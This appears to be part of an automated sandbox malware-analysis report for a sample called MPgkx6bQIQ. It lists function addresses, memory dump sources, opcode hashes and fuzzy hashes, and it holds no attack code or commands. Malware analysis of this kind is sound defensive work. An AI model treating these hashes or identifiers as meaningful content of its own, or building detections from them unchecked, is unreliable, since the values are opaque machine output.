                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
                                                                                                                                                                                                                                                                                          • Instruction ID: b593eabd3734573ca464a0f0c89662c3852b345cc910da406a972fedca83911a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d103255a358cbf0f4493334fed60bd47c6ce4713af475a6909a9917db2fa4dc
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CDC1ED3AA18611CFC704CF28D8D066AB7E2FB8E315F19887DE98687352D738D945CB46
                                                                                                                                                                                                                                                                                          Function 02485C57 Relevance: .4, Instructions: 400COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 9f2680bab9b6854d00e0753734e73372bb980c2eb61b62fe20cb4c3e0bac24b1
                                                                                                                                                                                                                                                                                          • Instruction ID: 87b3f835fa5bd3ce3770cbf32822303de73faf0344c427b6f8872b90041194a1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f2680bab9b6854d00e0753734e73372bb980c2eb61b62fe20cb4c3e0bac24b1
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EBE18A311083458FC321EF29C880A2BFBE5EF99204F44892EE5D987752E335E948CB96
                                                                                                                                                                                                                                                                                          Function 004059F0 Relevance: .4, Instructions: 400COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 2e3d702f462c947c04f76d2767d49a70cc8d8a13f72f5fef100d598c3194e41d
                                                                                                                                                                                                                                                                                          • Instruction ID: 93b8c5387be001e94cab0129f885dbabef0bc68014b552001e05b684e15851e5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e3d702f462c947c04f76d2767d49a70cc8d8a13f72f5fef100d598c3194e41d
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 48E19A712087418FD720DF29C880A6BBBE1EF99304F44882EE4D597792E379E944CB96
                                                                                                                                                                                                                                                                                          Function 004166A0 Relevance: .4, Instructions: 377COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                                                                                                                                                                                          • Instruction ID: 32691a19542b475e5b32abf01bf61a59727b98503660fe5e1cf9ea7214f750c2
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f471f3d39aca677c1a2c39babe6ca4d167e6e7ed24f73cd0afd5c860e5d8b012
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FBC1CEB4600302CFD7248F25C8917A2BBB1FF46314F1986ADD4964F792E778E885CB95
                                                                                                                                                                                                                                                                                          Function 00428BC0 Relevance: .4, Instructions: 370COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: ac1a7de888730ed19efd1b3a810a8cf5ee67ec92a46044f1e54f4af5458cd7db
                                                                                                                                                                                                                                                                                          • Instruction ID: f9929a72ce68a40c3f81f5f1acad1d241ce5af9a0f8176ac8c595b8a2b44423d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ac1a7de888730ed19efd1b3a810a8cf5ee67ec92a46044f1e54f4af5458cd7db
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDD15535B05255CFDB14CFB8E8816AEBBB2AF1A300F58417DE551A7392CB388E05CB59
                                                                                                                                                                                                                                                                                          Function 02499541 Relevance: .4, Instructions: 362COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 0a6ff38b7f88a38b39f0feb0216d1201f336bfe1d4496b7dedc26c113c3b1706
                                                                                                                                                                                                                                                                                          • Instruction ID: d5cd215c1b13ba096a7edb23500220196433edaf6f6a9a1475f9fa8c711fd96c
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a6ff38b7f88a38b39f0feb0216d1201f336bfe1d4496b7dedc26c113c3b1706
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 25A15971211740CFD729CF29C861A777BF2EF86314719869DD4A28F7A5EB38A801CB50
                                                                                                                                                                                                                                                                                          Function 004192DA Relevance: .4, Instructions: 362COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 07b520a97f650d78ec3e4206198fbb7b152170e0c1bb9b71eb1cf8cd26d43cec
                                                                                                                                                                                                                                                                                          • Instruction ID: c7afa36b394fec79d3864c076b52a9d2828a05187d2106694a5d2b7072183649
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 07b520a97f650d78ec3e4206198fbb7b152170e0c1bb9b71eb1cf8cd26d43cec
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30A11571205701CFD329CF28C4A19A777E2FF8A310719869DD4A68B3A5EB38AC41CB54
                                                                                                                                                                                                                                                                                          Function 02489967 Relevance: .4, Instructions: 351COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
                                                                                                                                                                                                                                                                                          • Instruction ID: 5afb1460680354047d935c25dbd2acdec0722937b9f4673cbcad6947d0f24301
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d8522f48c061d96a90bcbb954765979172c44a155916e8e09891f3aefe40ca7a
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ADC1F1B16183808BD318DF25C850ABFBBE6EFD2308F14492DE5D68B391DB75850ACB56
                                                                                                                                                                                                                                                                                          Function 00414070 Relevance: .3, Instructions: 346COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 5eec315c10c9a67952a9793dbef498c3585f4719540dfb14f25a11beae5eb4f2
                                                                                                                                                                                                                                                                                          • Instruction ID: 3a875cd6648c61770c451858fbf1e99b01c2ef70bfb09da3693ab00193ad4cb1
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5eec315c10c9a67952a9793dbef498c3585f4719540dfb14f25a11beae5eb4f2
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 478134B15143048BC728DF24D8A26B7B3F0EF95354F08892EE98687391F738D989C766
                                                                                                                                                                                                                                                                                          Function 0249D847 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 7d343a94ccc60b0ac76136acfacaf03ec9124c15c7c37e786dc5ab8e490f6e03
                                                                                                                                                                                                                                                                                          • Instruction ID: 0c100f2d4de115c9ded8dd2cfb0a6a23680a0c9a74b9ca201eb025d84a464506
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d343a94ccc60b0ac76136acfacaf03ec9124c15c7c37e786dc5ab8e490f6e03
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FB1F775904201EFDB25AF24CC41B2ABBE2BFD5324F054A3EF8D8A72A0D7369915DB41
                                                                                                                                                                                                                                                                                          Function 0041D5E0 Relevance: .3, Instructions: 315COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 6cf664f652a807fb332ea88b5576aae59d3ab4033112652d5c76049a14ce75c6
                                                                                                                                                                                                                                                                                          • Instruction ID: 4462778536881e7fad7e7429092b9e4e0939b3ac367c8c146f109192ca963606
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6cf664f652a807fb332ea88b5576aae59d3ab4033112652d5c76049a14ce75c6
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 22B1E4B5D04301AFD7109F24CC42B5BBBE1ABD5318F144A3EF8D8A32A1D7399945DB8A
                                                                                                                                                                                                                                                                                          Function 024B5AF7 Relevance: .3, Instructions: 310COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 34b9a0d7ad4e2640ff3c38ec8b4415170da73e2657f5b2be8b12e8c2df11fb82
                                                                                                                                                                                                                                                                                          • Instruction ID: 2ffce5f4b4a7fa93f6d8685f9bb1eeb9f3092d4439e2c3050df267a235513741
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34b9a0d7ad4e2640ff3c38ec8b4415170da73e2657f5b2be8b12e8c2df11fb82
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 67B10772E086918FC716CB7CCC816AAFFB25F96220B4DC399D4A5DB3D6C6259802C771
                                                                                                                                                                                                                                                                                          Function 00435890 Relevance: .3, Instructions: 310COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 34b9a0d7ad4e2640ff3c38ec8b4415170da73e2657f5b2be8b12e8c2df11fb82
                                                                                                                                                                                                                                                                                          • Instruction ID: 82f263c77167ee55bcd91cd3b2c817a9180a54af617eadf61d99f91933eb0c98
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34b9a0d7ad4e2640ff3c38ec8b4415170da73e2657f5b2be8b12e8c2df11fb82
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 28B15B72E04B918FC715CA7CCC8169ABFB25B9B230F1DC399D4A5DB3D6C63998028761
                                                                                                                                                                                                                                                                                          Function 024864B7 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: a1afe4e88f9b97e7e8e8fd3cb907a0d95dd7110aea04d164d9c56f244693baaf
                                                                                                                                                                                                                                                                                          • Instruction ID: b2988e813993c47ff3f8bbba18ac10b03bf960780b9256612b22f6566fb030fc
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1afe4e88f9b97e7e8e8fd3cb907a0d95dd7110aea04d164d9c56f244693baaf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4BC16CB2A187418FC360DF68CC86BABB7E1BF85318F09492DD1D9C6342E778A155CB06
                                                                                                                                                                                                                                                                                          Function 00406250 Relevance: .3, Instructions: 303COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: a1afe4e88f9b97e7e8e8fd3cb907a0d95dd7110aea04d164d9c56f244693baaf
                                                                                                                                                                                                                                                                                          • Instruction ID: 6c2276beaf566b9a9bdc1ff0447d0761e6db3ed1e3725ba86175889a0c87908a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a1afe4e88f9b97e7e8e8fd3cb907a0d95dd7110aea04d164d9c56f244693baaf
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D5C16CB29087418FC360CF28DC96BABB7E1BF85318F09493DD1DAD6242D778A155CB0A
                                                                                                                                                                                                                                                                                          Function 004082AE Relevance: .3, Instructions: 291COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: b60e4508a8573308057a18d506d0e04534aaf532080dedfe112986a424425a5f
                                                                                                                                                                                                                                                                                          • Instruction ID: 9bc7db52ed85e8ce12a1b60bd9a2e1d492efdcd6eda8f0880cc64574571f8d9a
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b60e4508a8573308057a18d506d0e04534aaf532080dedfe112986a424425a5f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8911D31A087415BC7188E29DDD026EBBD3ABD1320F1D8A3EE8E5273D5DB3C59058B85
                                                                                                                                                                                                                                                                                          Function 02497BA7 Relevance: .3, Instructions: 262COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 82812cdeafcd33f0fc968029d79aa7a24ca844b7ad5e98367da50fc895b2220f
                                                                                                                                                                                                                                                                                          • Instruction ID: 37670ad763e9432da03cbed8179aa3cb8d30f97b8a687b10ed2913b1bee89d7e
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82812cdeafcd33f0fc968029d79aa7a24ca844b7ad5e98367da50fc895b2220f
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A571D8B42246009FDB658F28C9C0A7BFBA2EFD7714B29962DD196477A1C731E852CB04
                                                                                                                                                                                                                                                                                          Function 024B9107 Relevance: .2, Instructions: 248COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: 908f5c4351c674361b7bf87d10fb2e8a93db02d5169a9e62b5518be8655f3495
                                                                                                                                                                                                                                                                                          • Instruction ID: de93ff7c789e8ae12f3da9f9271a760ef48fb05d6271011cbfa1abd641f978d0
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 908f5c4351c674361b7bf87d10fb2e8a93db02d5169a9e62b5518be8655f3495
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 87516776A082404BE719DB29CC50BBFB7D2EF85714F19893ED6C2973D0DB3198018B66
                                                                                                                                                                                                                                                                                          Function 00438EA0 Relevance: .2, Instructions: 248COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 7e1e2bd57024711a969da7a5989223a080c99baaedaefbfca515799cce74d871
                                                                                                                                                                                                                                                                                          • Instruction ID: 96e128fd99fbf524e2f3ef55e43501592b1a8fdc9f4199c5c04fa81f22471a0d
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e1e2bd57024711a969da7a5989223a080c99baaedaefbfca515799cce74d871
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 96517276A083404FE718DA29CC51B2BB7E3EBD9314F19953EE5C297381DA799C01838A
                                                                                                                                                                                                                                                                                          Function 024BD7E7 Relevance: .2, Instructions: 246COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693888263.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2480000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                                                                          • Opcode ID: b458a4b395c5c8ee69f5f2b006b0e563729d6c6f05da1ba1057fcc05e7f9fb9b
                                                                                                                                                                                                                                                                                          • Instruction ID: fe9d5ccd016fa72b61f29e3ed14a7acdbf69d4f219ddcb7ae9a878229e7773e5
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b458a4b395c5c8ee69f5f2b006b0e563729d6c6f05da1ba1057fcc05e7f9fb9b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C812571A08311DFC7658F18C880AAFB7E2EF89714F18856DE99587364D731EC51CBA2
                                                                                                                                                                                                                                                                                          Function 0043D580 Relevance: .2, Instructions: 246COMMON
                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1693216744.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1693216744.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_MPgkx6bQIQ.jbxd
                                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2994545307-0
